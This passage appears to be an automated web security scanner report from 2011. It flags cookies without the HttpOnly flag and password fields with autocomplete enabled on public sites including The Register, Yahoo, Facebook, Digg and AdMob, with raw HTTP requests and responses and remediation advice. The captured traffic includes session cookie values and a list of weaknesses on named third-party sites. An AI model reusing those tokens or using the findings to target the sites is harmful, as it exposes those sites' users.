Expires: Wed, 12 Jan 2011 13:07:54 GMT
Cache-Control: max-age=360, stale-if-error=86400
X-CNET-HEADERREMOVE: Cache-Control
X-CNET-HEADER-Cache-Control: max-age=360
Content-Type: text/html; charset=UTF-8
Set-Cookie: arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:31:54 GMT
Set-Cookie: arrowLrps=1294610272673; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 13:01:54 GMT
Set-Cookie: arrowLat=1294837313774; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 13:01:54 GMT
Set-Cookie: arrowSpc=1; domain=.cnet.com; path=/; expires=Fri, 11-Feb-2011 13:01:54 GMT
Set-Cookie: arrowTmUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 14:01:54 GMT
Set-Cookie: arrowLnUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:02:54 GMT
Set-Cookie: arrowBiChecked=true; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:01:59 GMT
Set-Cookie: arrowHtcUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:02:54 GMT
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Keep-Alive: timeout=15, max=994
Connection: Keep-Alive
Content-Length: 36086

<!DOCTYPE html> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml"> <!-- Yoda loves you -->
<head> <title>Webware
...[SNIP]...

11.59. http://download.cnet.com/windows/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://download.cnet.com
Path:   /windows/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /windows/ HTTP/1.1
Host: download.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: XCLGFbrowser=Cg5iVU0qL2O/AAAAdRw; MADTEST=1; rbSessionId=Cg5gU00qL2CtwdbzqSI; MADUCAT=1&0109&BK14860; mad_rsi_segs=; arrowLat=1294610272673; arrowSpc=1; tempSessionId=Cg5gnU0qL2CtwdbzfuE; arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html;

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 13:01:55 GMT
Via: HTTP/1.0 phx1-rb-dl-app1.cnet.com:8924 (cnwk.proxy.servlet.PathProxyServlet $Revision: 218012 $)
Content-Language: en-US
Expires: Wed, 12 Jan 2011 13:05:39 GMT
Cache-Control: max-age=360, stale-if-error=86400
X-CNET-HEADERREMOVE: Cache-Control
X-CNET-HEADER-Cache-Control: max-age=360
Age: 136
Content-Type: text/html; charset=UTF-8
Set-Cookie: arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:31:55 GMT
Set-Cookie: arrowLrps=1294610272673; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 13:01:55 GMT
Set-Cookie: arrowLat=1294837315852; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 13:01:55 GMT
Set-Cookie: arrowSpc=1; domain=.cnet.com; path=/; expires=Fri, 11-Feb-2011 13:01:55 GMT
Set-Cookie: arrowTmUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 14:01:55 GMT
Set-Cookie: arrowLnUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:02:55 GMT
Set-Cookie: arrowBiChecked=true; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:02:00 GMT
Set-Cookie: arrowHtcUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:02:55 GMT
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Keep-Alive: timeout=15, max=909
Connection: Keep-Alive
Content-Length: 102759

<!DOCTYPE html> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml"> <!-- Yoda loves you -->
<head> <title>Free sof
...[SNIP]...

11.60. http://landesm.gfi.com/event-log-analysis-sm/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://landesm.gfi.com
Path:   /event-log-analysis-sm/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /event-log-analysis-sm/ HTTP/1.1
Host: landesm.gfi.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Wed, 12 Jan 2011 03:46:07 GMT
Etag: "17424fa7bc85ec85fc725f2b8328bb89ca03be4c"
Server: TornadoServer/1.0
Set-Cookie: __ptcx=7uXan4.9hp3Sx.1; expires=Mon, 11 Jul 2011 03:46:07 GMT; Path=/
Set-Cookie: __pcid=7uXan4:1; Domain=.gfi.com; expires=Mon, 11 Jul 2011 03:46:07 GMT; Path=/
Content-Length: 30171
Connection: Close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<META http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Event log analysis &amp; management</title>

...[SNIP]...

11.61. http://www.addthis.com/bookmark.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bookmark.php HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:17:39 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
Content-Length: 92111

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookm
...[SNIP]...

11.62. http://www.ccmaine.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ccmaine.net
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.ccmaine.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Mon, 10 Jan 2011 18:18:50 GMT
Server: Apache/2.2.3 (Debian) PHP/4.4.4-8+etch6
X-Powered-By: PHP/4.4.4-8+etch6
Set-Cookie: 1c7b37f4426f042e0fdf703338ebc738=d5da178e07009ab3ea602b970835b537; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: http://www.ccmaine.net/HomePage
Content-Length: 0
Content-Type: text/html; charset=UTF-8


11.63. http://www.zdnet.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.zdnet.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.zdnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 05:08:03 GMT
Server: Apache
Set-Cookie: geo-data=%7B%22region%22%3A%22tx%22%2C%22connectionspeed%22%3A%22broadband%22%2C%22regionconf%22%3A%224%22%2C%22metrocode%22%3A%22623%22%2C%22longittude%22%3A%22-96.799%22%2C%22countrycode%22%3A%22840%22%2C%22continentcode%22%3A%226%22%2C%22countryconf%22%3A%225%22%2C%22country%22%3A%22usa%22%2C%22city%22%3A%22dallas%22%2C%22cityconf%22%3A%223%22%2C%22citycode%22%3A%2277%22%2C%22domain%22%3A%22BNET%22%2C%22regioncode%22%3A%2244%22%2C%22latitude%22%3A%2232.787%22%7D; expires=Thu, 12-Jan-2012 05:08:03 GMT; path=/; domain=.zdnet.com
Keep-Alive: timeout=15, max=999
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 117305

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<me
...[SNIP]...

12. Password field with autocomplete enabled  previous  next
There are 15 instances of this issue:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).


12.1. http://account.theregister.co.uk/register/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://account.theregister.co.uk
Path:   /register/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /register/ HTTP/1.1
Host: account.theregister.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 03:12:21 GMT
Server: Apache/2.2.9 (Debian) mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: close
Content-Length: 30609

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang=en>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
</h2>


<form action="http://account.theregister.co.uk/register/" method="post" id="acc-edit">
<input type="hidden" name="product" value="theregister_newsletter">
...[SNIP]...
<td><input type="password" name="password" value="" size="30"></td>
...[SNIP]...
<td><input type="password" name="confirm_password" value="" size="30"></td>
...[SNIP]...

12.2. http://darkblue.com/index.htm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://darkblue.com
Path:   /index.htm

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /index.htm HTTP/1.1
Host: darkblue.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 03:34:07 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Content-Length: 5723
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Dar
...[SNIP]...
</h3>
<form name="" id="affiliateForm" action="https://www.darkblue.com/index.htm" method="POST">
    <input type="hidden" name="logintype" value="pub">
...[SNIP]...
<div class="error-wrap"><input id="affiliate-password" type="password" name="loginpass" class="required" /></div>
...[SNIP]...

12.3. http://darkblue.com/index.htm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://darkblue.com
Path:   /index.htm

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /index.htm HTTP/1.1
Host: darkblue.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 03:34:07 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Content-Length: 5723
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Dar
...[SNIP]...
</h3>
<form name="" id="advertiserForm" action="https://www.darkblue.com/index.htm" method="POST">
    <input type="hidden" name="logintype" value="adv">
...[SNIP]...
<div class="error-wrap"><input id="advertiser-password" type="password" name="loginpass" class="required" /></div>
...[SNIP]...

12.4. http://digg.com/submit  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /submit HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 03:34:26 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=1163899028811809024%3A154; expires=Thu, 13-Jan-2011 03:34:26 GMT; path=/; domain=digg.com
Set-Cookie: d=2d42bedfcbae53b8ee6f61a9c9010100cced8e8e45672361cf74370761950c78; expires=Mon, 11-Jan-2021 13:42:06 GMT; path=/; domain=.digg.com
X-Digg-Time: D=22051 10.2.130.26
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7384

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg
- Submit a link
</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics
...[SNIP]...
</script><form class="hidden">
<input type="text" name="ident" value="" id="ident-saved">
<input type="password" name="password" value="" id="password-saved">
</form>
...[SNIP]...

12.5. https://edit.yahoo.com/registration  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://edit.yahoo.com
Path:   /registration

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /registration?.src=fpctx&.intl=us&.done=http://www.yahoo.com/ HTTP/1.1
Host: edit.yahoo.com
Connection: keep-alive
Referer: http://www.yahoo.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: B=80eipqp6i4psl&b=3&s=j8

Response

HTTP/1.1 200 OK
Date: Tue, 11 Jan 2011 22:45:53 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Cache-Control: private
Connection: close
Content-Type: text/html
Content-Length: 50154


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html lang="en-US">
<head>
   <meta http-equiv="content-type" content="text/html; charset=UTF-8">    
   <t
...[SNIP]...
<!-- begin: form -->
<form id="regFormBody" name="regFormBody" action="/registration" method="post">

<input type="hidden" id="parentreg" name=".parentreg" value="">
...[SNIP]...
<div class="collection">
<input type="password" name="password" id="password" value="" size="32" maxlength="32" class="">
<div id="meter_tag">
...[SNIP]...
<div class="collection">
<input type="password" name="passwordconfirm" id="passwordconfirm" value="" size="32" maxlength="32" class="">
</div>
...[SNIP]...

12.6. http://forums.theregister.co.uk/forum/1/2011/01/07/open_source_crypto_curbs/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://forums.theregister.co.uk
Path:   /forum/1/2011/01/07/open_source_crypto_curbs/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /forum/1/2011/01/07/open_source_crypto_curbs/ HTTP/1.1
Host: forums.theregister.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 13:02:26 GMT
Server: Apache/2.2.9 (Debian) mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: close
Content-Length: 46429


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<
...[SNIP]...
</p>
<form method=POST action="http://account.theregister.co.uk/login/">
<input type=hidden name=r value="http://forums.theregister.co.uk/forum/1/2011/01/07/open_source_crypto_curbs/">
...[SNIP]...
</span>
<input class=text type=password name=password></label>
...[SNIP]...

12.7. http://forums.theregister.co.uk/forum/1/2011/01/07/open_source_crypto_curbs/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://forums.theregister.co.uk
Path:   /forum/1/2011/01/07/open_source_crypto_curbs/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /forum/1/2011/01/07/open_source_crypto_curbs/ HTTP/1.1
Host: forums.theregister.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 13:02:26 GMT
Server: Apache/2.2.9 (Debian) mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: close
Content-Length: 46429


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<
...[SNIP]...
</div>


<form method=POST action="http://forums.theregister.co.uk/post/submit/2011/01/07/open_source_crypto_curbs/" class=box id=comment-form name=comment-form>

<h3>
...[SNIP]...
<div><input name=password type=password></div>
...[SNIP]...

12.8. http://lists.arin.net/mailman/listinfo/arin-whoisrws  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://lists.arin.net
Path:   /mailman/listinfo/arin-whoisrws

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /mailman/listinfo/arin-whoisrws HTTP/1.1
Host: lists.arin.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 13:02:59 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: text/html; charset=us-ascii
Content-Length: 12065

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<!-- $Revision: 2.4 $ -->
<!--
...[SNIP]...
<fieldset class="standard">
<FORM Method=POST ACTION="../subscribe/arin-whoisrws">

<h3 class="mail_h3">
...[SNIP]...
</label>
<INPUT type="Password" name="pw" size="15"></li>
...[SNIP]...
</label>
<INPUT type="Password" name="pw-conf" size="15"></li>
...[SNIP]...

12.9. http://whitepapers.theregister.co.uk/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://whitepapers.theregister.co.uk
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: whitepapers.theregister.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 13:07:34 GMT
Server: Apache/2.2.9 (Debian) mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: close
Content-Length: 34233

<!DOCTYPE html>
<html lang=en>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Whitepapers and tech resources from The Register</title>
<link rel="stylesheet" href="/
...[SNIP]...
</div>


<form action="http://account.theregister.co.uk/login/" method="post" id="Login">
<input type=hidden name=r value="http://whitepapers.theregister.co.uk/">
...[SNIP]...
<td><input type="password" name="password" class="Text" tabindex="4"></td>
...[SNIP]...

12.10. http://whitepapers.theregister.co.uk/search/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://whitepapers.theregister.co.uk
Path:   /search/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /search/ HTTP/1.1
Host: whitepapers.theregister.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 13:07:35 GMT
Server: Apache/2.2.9 (Debian) mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: close
Content-Length: 24426

<!DOCTYPE html>
<html lang=en>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Search for ...... ... Reg Whitepapers</title>
<link rel="stylesheet" href="/style_picke
...[SNIP]...
</div>


<form action="http://account.theregister.co.uk/login/" method="post" id="Login">
<input type=hidden name=r value="http://whitepapers.theregister.co.uk/search/">
...[SNIP]...
<td><input type="password" name="password" class="Text" tabindex="4"></td>
...[SNIP]...

12.11. http://www.43things.com/person/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.43things.com
Path:   /person/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /person/ HTTP/1.1
Host: www.43things.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Wed, 12 Jan 2011 13:08:00 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.4
X-Runtime: 0.01017
Cache-Control: no-cache
Set-Cookie: ubid=SV2zpKsaoTKvCsQCCVAPEBCrBaA%3D; domain=.43things.com; path=/; expires=Sat, 09 Jan 2021 13:08:00 GMT
Set-Cookie: auth=pnAiy5OTmH8VYlJnGjHyFoBpPvpc4DPnYbLKjnQeNv9Q7ss4zO9i2gGP8aKM5xF9EY9nas978c%2BQyCXn8qgOvWb28tIflxH1k8TKgw8KLZE%3D; domain=.43things.com; path=/; expires=Sat, 09 Jan 2021 13:08:00 GMT
Set-Cookie: rw=; domain=.43things.com; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _session_id=29d6c53e1159bfde1f23b713b0b5d77e; domain=.43things.com; path=/
Content-Length: 13962
Status: 404 Not Found
Cache-Control: max-age=1
Expires: Wed, 12 Jan 2011 13:08:01 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>43 Things</title>
<m
...[SNIP]...
</div>


<form name="existingAccount" action="/auth/login" method="post" onsubmit="new Ajax.Updater('overlay', '/auth/loginjs', {asynchronous:true, evalScripts:true, onLoading:function(request){ajax_status('loadingmsg','<img src=/images/icons/indicator.gif align=middle>', 'replace')}, parameters:Form.serialize(this)}); return false;">

<table class="login-form">
...[SNIP]...
<td align="left" style="background:url('http://acf.43things.com/images/nav/login_input_background.gif') no-repeat left top; width:299px;"><input class="login-input" id="person_password" name="person[password]" size="30" type="password" /></td>
...[SNIP]...

12.12. http://www.admob.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.admob.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.admob.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 13:08:05 GMT
Server: Apache
Set-Cookie: session_cookie=bd074ecbb806244a67a03a6f2aac7d85; expires=Wed, 12-Jan-2011 15:08:05 GMT; path=/; domain=.admob.com
Set-Cookie: mrkting_landing_page_url=%2F; expires=Sat, 09-Jan-2021 13:08:05 GMT; path=/; domain=.admob.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13118

<!doctype html>
<html>
   <head>
       <title>Mobile Advertising | Buy Ads | Monetize Traffic | AdMob</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<met
...[SNIP]...
</div>
<form method="post" action="https://www.admob.com/home/login/login">
<label for="username">
...[SNIP]...
</label>
<input class="password" type="password" name="password" />
<div id="login_widget_extra">
...[SNIP]...

12.13. http://www.connect.facebook.com/widgets/fan.php  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.connect.facebook.com
Path:   /widgets/fan.php

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /widgets/fan.php HTTP/1.1
Host: www.connect.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=450x25; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dpandora.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.pandora.com%252F%26extra_2%3DUS;

Response

HTTP/1.1 404 Not Found
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Connection: close
Date: Wed, 12 Jan 2011 04:27:30 GMT
Content-Length: 11326

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://login.connect.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

12.14. http://www.sentinelinvestments.com/advisor-login  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.sentinelinvestments.com
Path:   /advisor-login

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /advisor-login HTTP/1.1
Host: www.sentinelinvestments.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=22150713.1294754867.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=qmis707mdaq9bcgqjvjtrnmke6; __utma=22150713.441323346.1294754867.1294754867.1294754867.1; __utmc=22150713; __utmb=22150713.4.10.1294754867;

Response

HTTP/1.1 200 OK
Date: Tue, 11 Jan 2011 16:03:18 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
